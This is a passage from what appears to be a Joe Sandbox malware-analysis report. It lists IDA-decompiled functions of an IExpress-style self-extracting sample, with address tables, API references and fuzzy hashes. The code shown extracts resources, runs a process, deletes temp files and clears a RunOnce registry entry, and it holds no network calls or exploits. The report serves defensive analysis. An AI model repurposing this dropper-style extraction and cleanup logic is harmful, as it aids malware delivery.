					_t34 =  *0x409a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0x409a2c = _t44;
						}
					}
				}
				E0040411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0x409a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}


















                                                                                                                                                                                                                                    0x00403fef
                                                                                                                                                                                                                                    0x00403ffa
                                                                                                                                                                                                                                    0x00404001
                                                                                                                                                                                                                                    0x00404008
                                                                                                                                                                                                                                    0x0040400a
                                                                                                                                                                                                                                    0x0040400b
                                                                                                                                                                                                                                    0x00404010
                                                                                                                                                                                                                                    0x0040410a
                                                                                                                                                                                                                                    0x0040411a
                                                                                                                                                                                                                                    0x0040411a
                                                                                                                                                                                                                                    0x0040401c
                                                                                                                                                                                                                                    0x0040401d
                                                                                                                                                                                                                                    0x0040401e
                                                                                                                                                                                                                                    0x0040401f
                                                                                                                                                                                                                                    0x00404033
                                                                                                                                                                                                                                    0x0040403b
                                                                                                                                                                                                                                    0x004040ca
                                                                                                                                                                                                                                    0x004040e9
                                                                                                                                                                                                                                    0x004040f8
                                                                                                                                                                                                                                    0x00404101
                                                                                                                                                                                                                                    0x00404106
                                                                                                                                                                                                                                    0x00404106
                                                                                                                                                                                                                                    0x00404108
                                                                                                                                                                                                                                    0x00404108
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00404108
                                                                                                                                                                                                                                    0x00404049
                                                                                                                                                                                                                                    0x0040405c
                                                                                                                                                                                                                                    0x00404062
                                                                                                                                                                                                                                    0x00404068
                                                                                                                                                                                                                                    0x0040406e
                                                                                                                                                                                                                                    0x00404070
                                                                                                                                                                                                                                    0x00404077
                                                                                                                                                                                                                                    0x0040407f
                                                                                                                                                                                                                                    0x00404089
                                                                                                                                                                                                                                    0x0040408b
                                                                                                                                                                                                                                    0x0040408b
                                                                                                                                                                                                                                    0x00404089
                                                                                                                                                                                                                                    0x00404077
                                                                                                                                                                                                                                    0x00404091
                                                                                                                                                                                                                                    0x0040409c
                                                                                                                                                                                                                                    0x004040a8
                                                                                                                                                                                                                                    0x004040b8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004040c2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004040c2

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateProcessA.KERNELBASE ref: 00404033
                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404049
                                                                                                                                                                                                                                    • GetExitCodeProcess.KERNELBASE ref: 0040405C
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040409C
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004040A8
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 004040DC
                                                                                                                                                                                                                                    • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 004040E9
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3183975587-0
                                                                                                                                                                                                                                    • Opcode ID: c33a7784897af704f97ccb375b736f5f528657ed17549b8f0599f9aa640b82fa
                                                                                                                                                                                                                                    • Instruction ID: f55851d03d85abb9b2f3690b68a1bd7c8abf884a38cd72d7ac8736cd390e9c04
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c33a7784897af704f97ccb375b736f5f528657ed17549b8f0599f9aa640b82fa
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3431ADB1640218ABEB209F65DD4CFAB7778EBD4714F1041BAFA45F62A1CA344C81CE29
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 004051E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E004051E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E0040468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E0040468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E004044B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0x409124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0x409124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E004044B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0x409124 = 0x80070714;
					goto L10;
				}
				E004044B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x409124 = E00406285();
				goto L10;
			}






                                                                                                                                                                                                                                    0x004051fb
                                                                                                                                                                                                                                    0x00405207
                                                                                                                                                                                                                                    0x0040520b
                                                                                                                                                                                                                                    0x0040523c
                                                                                                                                                                                                                                    0x00405268
                                                                                                                                                                                                                                    0x00405270
                                                                                                                                                                                                                                    0x0040528b
                                                                                                                                                                                                                                    0x00405293
                                                                                                                                                                                                                                    0x0040529c
                                                                                                                                                                                                                                    0x004052a6
                                                                                                                                                                                                                                    0x004052b0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004052b0
                                                                                                                                                                                                                                    0x0040529e
                                                                                                                                                                                                                                    0x00405279
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040527b
                                                                                                                                                                                                                                    0x00405273
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405273
                                                                                                                                                                                                                                    0x0040524a
                                                                                                                                                                                                                                    0x00405250
                                                                                                                                                                                                                                    0x00405256
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405256
                                                                                                                                                                                                                                    0x00405219
                                                                                                                                                                                                                                    0x00405223
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: memcpy_s.MSVCRT ref: 004046E5
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00402F4D,?,00000002,00000000), ref: 00405201
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00405250
                                                                                                                                                                                                                                      • Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
                                                                                                                                                                                                                                      • Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554
                                                                                                                                                                                                                                      • Part of subcall function 00406285: GetLastError.KERNEL32(00405BBC), ref: 00406285
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                    • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                    • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                    • Opcode ID: e3db67eab3910edaea3737147de99a2175cce266038d5d97a37fd31f5e8d6ee5
                                                                                                                                                                                                                                    • Instruction ID: 09f94c95ee8dde742b6e9a7adb48e62a9eab8c8aba96d5021a361f4290a7392f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e3db67eab3910edaea3737147de99a2175cce266038d5d97a37fd31f5e8d6ee5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2211E2B5300205ABE3286B725E49F3B619DDFC8394B10447FBB02F62E0DABD8C11492D
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 004052B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                    			E004052B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0x408004; // 0x8f135e3b
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0x4091e0; // 0x4f6d228
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0x408a24 == 0 &&  *0x409a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t2 =  &(_t31[1]); // 0x4f6d218
						_t31 =  *_t2;
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0x408a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0x408a24 == 0 &&  *0x409a30 == 0) {
					_push(_t22);
					E00401781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
					if(( *0x409a34 & 0x00000020) != 0) {
						E004065E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E00402390( &_v268);
					_t11 =  *0x408a20; // 0x0
				}
				if( *0x409a40 != 1 && _t11 != 0) {
					_t11 = E00401FE1(_t22); // executed
				}
				 *0x408a20 =  *0x408a20 & 0x00000000;
				return E00406CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}












                                                                                                                                                                                                                                    0x004052b6
                                                                                                                                                                                                                                    0x004052b6
                                                                                                                                                                                                                                    0x004052b6
                                                                                                                                                                                                                                    0x004052c1
                                                                                                                                                                                                                                    0x004052c8
                                                                                                                                                                                                                                    0x004052cb
                                                                                                                                                                                                                                    0x004052cc
                                                                                                                                                                                                                                    0x004052d4
                                                                                                                                                                                                                                    0x004052d6
                                                                                                                                                                                                                                    0x004052d7
                                                                                                                                                                                                                                    0x004052de
                                                                                                                                                                                                                                    0x004052e0
                                                                                                                                                                                                                                    0x004052f2
                                                                                                                                                                                                                                    0x004052fa
                                                                                                                                                                                                                                    0x004052fa
                                                                                                                                                                                                                                    0x00405302
                                                                                                                                                                                                                                    0x00405302
                                                                                                                                                                                                                                    0x00405305
                                                                                                                                                                                                                                    0x0040530c
                                                                                                                                                                                                                                    0x00405312
                                                                                                                                                                                                                                    0x00405316
                                                                                                                                                                                                                                    0x00405316
                                                                                                                                                                                                                                    0x00405317
                                                                                                                                                                                                                                    0x0040531c
                                                                                                                                                                                                                                    0x0040531f
                                                                                                                                                                                                                                    0x00405333
                                                                                                                                                                                                                                    0x00405345
                                                                                                                                                                                                                                    0x00405351
                                                                                                                                                                                                                                    0x00405359
                                                                                                                                                                                                                                    0x00405359
                                                                                                                                                                                                                                    0x00405363
                                                                                                                                                                                                                                    0x00405369
                                                                                                                                                                                                                                    0x0040536f
                                                                                                                                                                                                                                    0x00405374
                                                                                                                                                                                                                                    0x00405374
                                                                                                                                                                                                                                    0x00405381
                                                                                                                                                                                                                                    0x00405387
                                                                                                                                                                                                                                    0x00405387
                                                                                                                                                                                                                                    0x0040538f
                                                                                                                                                                                                                                    0x004053a0

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetFileAttributesA.KERNELBASE(04F6D228,00000080,?,00000000), ref: 004052F2
                                                                                                                                                                                                                                    • DeleteFileA.KERNELBASE(04F6D228), ref: 004052FA
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(04F6D228,?,00000000), ref: 00405305
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(04F6D228), ref: 0040530C
                                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(004011FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00405363
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00405334
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                    • API String ID: 2833751637-2312194364
                                                                                                                                                                                                                                    • Opcode ID: 0ac7930ffb9e2ea93b9501b38ef617429c3f56ca169f26fd8768bff6fd321f03
                                                                                                                                                                                                                                    • Instruction ID: a399f6850f9857e4a2a636118a1f1a303e38fc590d24b9381051fc2fad193b26
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ac7930ffb9e2ea93b9501b38ef617429c3f56ca169f26fd8768bff6fd321f03
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43217C31600618DBDB24AB24EE09B6A77A4EB14754F04017EE882766E1CBB85D94CF5C
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00401FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23registryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00401FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0x408530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}





                                                                                                                                                                                                                                    0x00401fee
                                                                                                                                                                                                                                    0x00402005
                                                                                                                                                                                                                                    0x0040200d
                                                                                                                                                                                                                                    0x00402017
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402020
                                                                                                                                                                                                                                    0x0040200d
                                                                                                                                                                                                                                    0x00402029

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0040538C,?,?,0040538C), ref: 00402005
                                                                                                                                                                                                                                    • RegDeleteValueA.KERNELBASE(0040538C,wextract_cleanup0,?,?,0040538C), ref: 00402017
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(0040538C,?,?,0040538C), ref: 00402020
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                                                                                                                                                    • API String ID: 849931509-702805525
                                                                                                                                                                                                                                    • Opcode ID: 4a4bbfe9345666091a03c04c6406ee07b10a2f14f218e9796807bdc021751f89
                                                                                                                                                                                                                                    • Instruction ID: 964837390bdcfb9f7028471f109179f02a98b209a827bd19e41bd068bc92d2f3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a4bbfe9345666091a03c04c6406ee07b10a2f14f218e9796807bdc021751f89
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4E04F31950318BBD7218F90EF0EF5A7B2DE700744F2001BABA04B01E0EBB65A24D60D
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00404CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                    			E00404CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0x408004; // 0x8f135e3b
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0x4091d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E00404E99(_t75);
						L35:
						return E00406CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0x408584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0x4091e4;
						_t58 = 0x4091e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0x4091e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0x4091e4;
						_t30 = E00404702( &_v268, 0x4091e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E0040476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E00404980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E004047E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0x4093f4 =  *0x4093f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0x4091e4;
						_t63 = 0x4091e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0x4091e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0x4091e4;
						_t30 = E00404702( &_v268, 0x4091e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E00404C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E00404B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E00404B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}































                                                                                                                                                                                                                                    0x00404cd0
                                                                                                                                                                                                                                    0x00404cdb
                                                                                                                                                                                                                                    0x00404ce0
                                                                                                                                                                                                                                    0x00404ce2
                                                                                                                                                                                                                                    0x00404cee
                                                                                                                                                                                                                                    0x00404cf2
                                                                                                                                                                                                                                    0x00404d0e
                                                                                                                                                                                                                                    0x00404d0e
                                                                                                                                                                                                                                    0x00404d11
                                                                                                                                                                                                                                    0x00404e83
                                                                                                                                                                                                                                    0x00404e88
                                                                                                                                                                                                                                    0x00404e98
                                                                                                                                                                                                                                    0x00404e98
                                                                                                                                                                                                                                    0x00404d17
                                                                                                                                                                                                                                    0x00404d17
                                                                                                                                                                                                                                    0x00404d1a
                                                                                                                                                                                                                                    0x00404d2f
                                                                                                                                                                                                                                    0x00404d2f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00404d2f
                                                                                                                                                                                                                                    0x00404d1c
                                                                                                                                                                                                                                    0x00404d1c
                                                                                                                                                                                                                                    0x00404d1f
                                                                                                                                                                                                                                    0x00404dcb
                                                                                                                                                                                                                                    0x00404dd0
                                                                                                                                                                                                                                    0x00404dd2
                                                                                                                                                                                                                                    0x00404ddd
                                                                                                                                                                                                                                    0x00404ddd
                                                                                                                                                                                                                                    0x00404de3
                                                                                                                                                                                                                                    0x00404de8
                                                                                                                                                                                                                                    0x00404ded
                                                                                                                                                                                                                                    0x00404ded
                                                                                                                                                                                                                                    0x00404def
                                                                                                                                                                                                                                    0x00404df0
                                                                                                                                                                                                                                    0x00404df0
                                                                                                                                                                                                                                    0x00404df4
                                                                                                                                                                                                                                    0x00404df4
                                                                                                                                                                                                                                    0x00404df6
                                                                                                                                                                                                                                    0x00404df9
                                                                                                                                                                                                                                    0x00404dfc
                                                                                                                                                                                                                                    0x00404dfc
                                                                                                                                                                                                                                    0x00404dfe
                                                                                                                                                                                                                                    0x00404dff
                                                                                                                                                                                                                                    0x00404dff
                                                                                                                                                                                                                                    0x00404e03
                                                                                                                                                                                                                                    0x00404e08
                                                                                                                                                                                                                                    0x00404e0a
                                                                                                                                                                                                                                    0x00404e0f
                                                                                                                                                                                                                                    0x00404d03
                                                                                                                                                                                                                                    0x00404d03
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00404d03
                                                                                                                                                                                                                                    0x00404e18
                                                                                                                                                                                                                                    0x00404e20
                                                                                                                                                                                                                                    0x00404e25
                                                                                                                                                                                                                                    0x00404e27
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00404e33
                                                                                                                                                                                                                                    0x00404e38
                                                                                                                                                                                                                                    0x00404e3a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00404e40
                                                                                                                                                                                                                                    0x00404e51
                                                                                                                                                                                                                                    0x00404e56
                                                                                                                                                                                                                                    0x00404e5b
                                                                                                                                                                                                                                    0x00404e5e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00404e6a
                                                                                                                                                                                                                                    0x00404e6f
                                                                                                                                                                                                                                    0x00404e71
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00404e77
                                                                                                                                                                                                                                    0x00404e7d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00404e7d
                                                                                                                                                                                                                                    0x00404d25
                                                                                                                                                                                                                                    0x00404d25
                                                                                                                                                                                                                                    0x00404d28
                                                                                                                                                                                                                                    0x00404d36
                                                                                                                                                                                                                                    0x00404d3b
                                                                                                                                                                                                                                    0x00404d40
                                                                                                                                                                                                                                    0x00404d40
                                                                                                                                                                                                                                    0x00404d42
                                                                                                                                                                                                                                    0x00404d43
                                                                                                                                                                                                                                    0x00404d43
                                                                                                                                                                                                                                    0x00404d47
                                                                                                                                                                                                                                    0x00404d4a
                                                                                                                                                                                                                                    0x00404d4a
                                                                                                                                                                                                                                    0x00404d4c
                                                                                                                                                                                                                                    0x00404d4f
                                                                                                                                                                                                                                    0x00404d4f
                                                                                                                                                                                                                                    0x00404d51
                                                                                                                                                                                                                                    0x00404d52
                                                                                                                                                                                                                                    0x00404d52
                                                                                                                                                                                                                                    0x00404d56
                                                                                                                                                                                                                                    0x00404d5b
                                                                                                                                                                                                                                    0x00404d5d
                                                                                                                                                                                                                                    0x00404d62
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00404d67
                                                                                                                                                                                                                                    0x00404d6f
                                                                                                                                                                                                                                    0x00404d74
                                                                                                                                                                                                                                    0x00404d76
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00404d7c
                                                                                                                                                                                                                                    0x00404d84
                                                                                                                                                                                                                                    0x00404d89
                                                                                                                                                                                                                                    0x00404d8b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00404d94
                                                                                                                                                                                                                                    0x00404d99
                                                                                                                                                                                                                                    0x00404d9e
                                                                                                                                                                                                                                    0x00404da1
                                                                                                                                                                                                                                    0x00404daa
                                                                                                                                                                                                                                    0x00404daa
                                                                                                                                                                                                                                    0x00404da3
                                                                                                                                                                                                                                    0x00404da3
                                                                                                                                                                                                                                    0x00404da3
                                                                                                                                                                                                                                    0x00404db5
                                                                                                                                                                                                                                    0x00404dbb
                                                                                                                                                                                                                                    0x00404dbd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00404dc3
                                                                                                                                                                                                                                    0x00404dc5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00404dc5
                                                                                                                                                                                                                                    0x00404dbd
                                                                                                                                                                                                                                    0x00404d2a
                                                                                                                                                                                                                                    0x00404d2a
                                                                                                                                                                                                                                    0x00404d2d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00404d2d
                                                                                                                                                                                                                                    0x00404cf8
                                                                                                                                                                                                                                    0x00404cfd
                                                                                                                                                                                                                                    0x00404d02
